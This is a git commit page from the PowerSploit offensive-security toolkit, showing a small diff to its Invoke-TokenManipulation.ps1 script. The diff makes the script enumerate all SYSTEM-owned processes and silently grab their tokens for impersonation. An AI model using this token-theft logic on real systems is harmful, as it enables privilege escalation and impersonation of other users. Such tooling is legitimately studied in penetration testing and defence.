aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/Invoke-TokenManipulation.ps1
diff options
context:
space:
mode:
authorPowerShellMafia <PowerShellMafia@users.noreply.github.com>2015-12-18 16:33:59 -0800
committerPowerShellMafia <PowerShellMafia@users.noreply.github.com>2015-12-18 16:33:59 -0800
commit9e771d15bf19ab3c2ac196393c088ecdab6c9a73 (patch)
tree58927893ecb9289ad1de64d3a67eb58d00e4b762 /Exfiltration/Invoke-TokenManipulation.ps1
parent9f78286ea7b0ec65d2aa09893a076864dd8d14e9 (diff)
parent9f183e36518176c4299eed5c68b7deac7f4e8025 (diff)
downloadPowerSploit-9e771d15bf19ab3c2ac196393c088ecdab6c9a73.tar.gz
PowerSploit-9e771d15bf19ab3c2ac196393c088ecdab6c9a73.zip
Merge pull request #102 from PowerShellMafia/devv3.0.0
Merge 3.0 release changes
Diffstat (limited to 'Exfiltration/Invoke-TokenManipulation.ps1')
-rw-r--r--Exfiltration/Invoke-TokenManipulation.ps111
1 files changed, 7 insertions, 4 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1
index 7bfce3b..3a61da8 100644
--- a/Exfiltration/Invoke-TokenManipulation.ps1
+++ b/Exfiltration/Invoke-TokenManipulation.ps1
@@ -49,8 +49,6 @@ Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-Version: 1.11
-(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe)
.DESCRIPTION
@@ -1685,8 +1683,13 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
$AllTokens = @()
#First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token.
- #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token.
- $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id
+ #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges.
+ #We need to enumrate all processes running as SYSTEM and find one that we can use.
+ $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq "NT AUTHORITY\SYSTEM"}
+ ForEach ($SystemToken in $SystemTokens)
+ {
+ $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue
+ }
if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))
{
Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens"